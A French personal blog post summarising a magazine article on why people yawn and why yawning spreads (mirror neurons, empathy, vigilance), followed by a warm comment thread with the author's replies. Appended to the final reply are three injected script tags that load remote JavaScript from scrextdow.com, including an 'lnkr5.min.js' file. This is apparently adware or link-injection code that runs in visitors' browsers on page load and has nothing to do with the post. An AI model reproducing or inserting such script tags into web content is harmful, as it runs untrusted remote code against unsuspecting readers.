• Pourquoi baîllons-nous ?

     

     

     

    Je bâille, tu bâilles, il bâille !

     

    Lue dans une revue, le pourquoi et le comment des bâillements, c'est très intéressant.

     

    Liviaaugustae

     

     

     

    Pourquoi baîllons-nous ?

    Prêt à faire dodo avec maman...

     

    (image internet)

     

     

     

     

     

    « Un bon bâilleur en fait bâiller sept » dit le dicton. Mais pourquoi le bâillement est-il communicatif ?

     



     

    Les causes du bâillement

     

    Le bâillement est un phénomène naturel qui survient 5 à 10 fois par jour. Il régule la faim, le sommeil, la veille. Sa fonction est de stimuler votre vigilance quand elle est en baisse, de vous reconnecter à votre environnement. C'est pourquoi vous bâillez au réveil, quand vous êtes fatiguée, quand vous vous ennuyez ou pendant la phase de digestion et... quand vous voyez quelqu'un bâiller.

     

    Humains, poissons, reptiles, mammifères... tous les vertébrés bâillent. Toutefois, l'effet communicatif ne concerne pas toutes les espèces. Seuls l'Homme et les grands primates auraient la capacité à faire bâiller leurs congénères.

     

    Pourquoi bâiller est si communicatif ?

     

    Vous l'aurez remarqué, votre voisine de bureau bâille et il vous prend l'envie irrépressible de vous mettre vous aussi à bâiller. Difficile de résister, c'est comme un réflexe, quelque chose d'instinctif et d'inconscient que vous ne contrôlez pas. Les scientifiques parlent d'échokinésie du bâillement. Votre amie vous parle en se touchant le lobe de l'oreille ? Il y a de fortes chances que vous fassiez la même chose sans vous en rendre compte. En cause, les neurones miroirs, des cellules nerveuses qui vous permettent de vous voir agir à la place de l'autre. Ils interviennent dans le phénomène neurologique à l'origine d'un apprentissage par imitation. C'est grâce aux neurones miroirs que vous êtes notamment douée d'empathie : "Seule la capacité de se mettre à la place de l'autre peut provoquer l'envie de bâiller" expliquait le Dr Oliver Walusinski, spécialiste du bâillement, dans une interview à France Info. Des études par IRM ont confirmé le rôle majeur des neurones miroirs dans l'effet communicatif du bâillement. Toutefois, tout le monde n'a pas la même capacité d'empathie et une personne sur 4 resterait insensible à un bâilleur. Une étude américaine réalisée sur 135 étudiants affirmait que les personnes les plus égoïstes et les moins sociables réagissaient très peu aux bâillements d'autrui tout comme les bébés pas encore doués d'empathie dans les premiers mois de leur vie.

     

    Selon les hypothèses, cet effet communicatif aurait pour but de maintenir la vigilance de tout un groupe et plus la proximité avec le bâilleur est proche plus les probabilités d'imitation sont fortes. Toutefois, l'oisiveté et le niveau de vigilance influenceraient cette capacité de mimétisme. En effet, plus vous êtes concentrée sur une tâche et moins vous êtes sensible aux bâillements de vos pairs.

     

     

     

    Communicatif oui, contagieux non

     

    Attention à la confusion. Alors que le caractère communicatif du bâillement a bien été identifié chez les primates il n'est pas approprié de parler de contagieux, le terme étant associé aux maladies infectieuses qui se transmettent par contact.

     

    Enfin, en plus de stimuler votre vigilance, bâiller vous aidera à recouvrer l'audition pendant un vol en avion, après de la plongée sous-marine et aide à se relaxer. Veillez toutefois à ne pas bâiller la bouche trop grande ouverte, le bâillement est la cause le plus fréquente de luxation de la mâchoire !

     

     


  • Commentaires

    1
    Jeudi 5 Juillet à 07:21

    chez nous on disait qu'un bon bailleur en faisait bailler 10.....mais il est vrai que pour ma part je baille tous les soirs presque à la même heure et puis ça me passe....j'avais mis ça sur la fatigue de la journée....mais tu m'a mis le doute....(lol), passe une bien agréable journée

      • Jeudi 5 Juillet à 10:53

        Bonjour Monique,

        Je pense que tout le monde baîlle le soir, car le sommeil vient frapper à la porte et il y a aussi la fatigue de la journée, du moins à mon avis.

        Belle journée

    2
    Jeudi 5 Juillet à 11:46

    C'est vrai que le bâillement est communicatif... Je ne sais pas si je baille souvent, mais il m'arrive de bayer aux corneilles! ;-). 

    Belle journée!

      • Jeudi 5 Juillet à 14:14

        Bonjour Maryline,

        Il paraît d'après ce que j'ai lu, que lorsque l'on baîlle cela détend...moi, les baîllements me mettent les larmes aux yeux, ce qui est très désagréable, mais je baîlle aussi aux corneilles...

        Belle après midi

    3
    Jeudi 5 Juillet à 17:39

    Très intéressant merci Livia, je baille systématiquement à mon cours d'aquacycling, mon ancien prof de tai chi disait que le bâillement était le lâcher prise et qu'il ne fallait surtout pas retenir son baillement

    Douce soirée

    Bises

      • Jeudi 5 Juillet à 20:38

        Bonsoir Laure,

        En effet, cet article trouvé dans une de mes revues m'a beaucoup intéressaée, j'aime baîller, j'avoue qque même avant d'avoir lu cet article, j'appréciais les baîllemets je trouve que cela me détend bien.

        Bises et belle soirée

    4
    Jeudi 5 Juillet à 18:37

    Très intéressant Livia.

    Arrivée sur mon île au bateau de 11h30 avec du crachin sur la route, je suis heureuse d'avoir retrouvé mon petit lopin de terre où le soleil a été très présent tout l'après midi. Pour l'accès internet, hier, en râlant un bon coup auprès d'orange (une fois de plus remarque...) j'ai fini par me faire offrir 2 fois 50 Go sur mon smartphone que le peux utiliser en connexion partagée afin d'accéder à ma messagerie, au blog et à internet. Le passage du technicien ORANGE est prévu pour le 12/07/2018. Peut-être la fin du tunnel, et certainement plus de visites chez les blogopotes. Bises et bonne soirée

      • Jeudi 5 Juillet à 20:40

        Bonsoir Zaza,

        Je suis contente pour toi, qu'orange enfin s'aprête à t'envoyer un technicien, d'habitude ils ne sont pas aussi lents.

        Belles vacances dans ton île.

        Bises

    5
    Jeudi 5 Juillet à 19:38

    La nature a tout prévu, c'est impressionnant quand on y pense

      • Jeudi 5 Juillet à 20:40

        Bonsoir Christian,

        Tu as raison la nature  a tout prévue, quand çà grippe, c'est qu'il y a un problème.

    6
    Jeudi 5 Juillet à 21:25

    Donc il existe des spécialistes du bâillement.

      • Jeudi 5 Juillet à 21:39

        Bonsoir Dr WO,

        Apparemment, c'est que j'ai déduis de l'article, ou alors c'est un "journaliste spécialisé" ?

    7
    Jeudi 5 Juillet à 23:43

    Du coup, je n'arrête plus de bailler ! remarque, l'heure tardive y fait largement ! 

    Très bon article qui détend .... et instruit tout à la fois !

    Bisous

      • Vendredi 6 Juillet à 00:45

        Cucou Luciole,

        Et voilà que moi aussi je me mets à baîller... je vais aller au dodo.

        Bisous

    8
    Samedi 7 Juillet à 11:40

    Bonjour Chantal. Oui c'est communicatif et difficile de s'en empêcher. Bisous

      • Samedi 7 Juillet à 12:11

        Bonjour Brigitte,

        Quand j'ai tapé ce texte, je me suis surprise à baîller, c'est fou comme c'est communicatif.

        Bisous

    9
    Marie-Gabrielle
    Dimanche 8 Juillet à 23:57

    Avant de lire votre article je ne baillais pas du tout car je suis du soir, et même du très grand soir, et voilà que dès que j'ai lu votre titre, et vu la photo du kangourou bailleur, à la seconde je me suis mise à bailler à me décrocher la mâchoire et ça dure encore !!! Je dois être sociable et altruiste, car je ne peux voir bailller quelqu'un sans me mettre à faire pareil, quitte à me contorsionner la bouche si c'est gênant (à l'église par exemple !!…) Je ne savais pas que cela dépendait du degré d'empathie. Et je ne savais pas non plus que c'était communicatif seulement chez les primates…

      • Lundi 9 Juillet à 00:11

        Bonsoir Marie-Gabrielle,

        Je dois vous avouer qu'en écrivant mon texte, je baîllais aussi à me décrocher la mâchoire, c'était épouvantable.

        Même si je ne vois personne baîller mais qu'on parle de baîller... je baîlle.

        J'ai trouvé cet article très intéressant et j'ai eu envie de l'éditer.

        J'ai eu un coup de coeur  devant l'image de ce petit kangourou baîllant dans le poche de sa maman, et j'ai décidé qu'il illustrerait mon article, bien entendu je baîlle en vous écrivant.

        <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :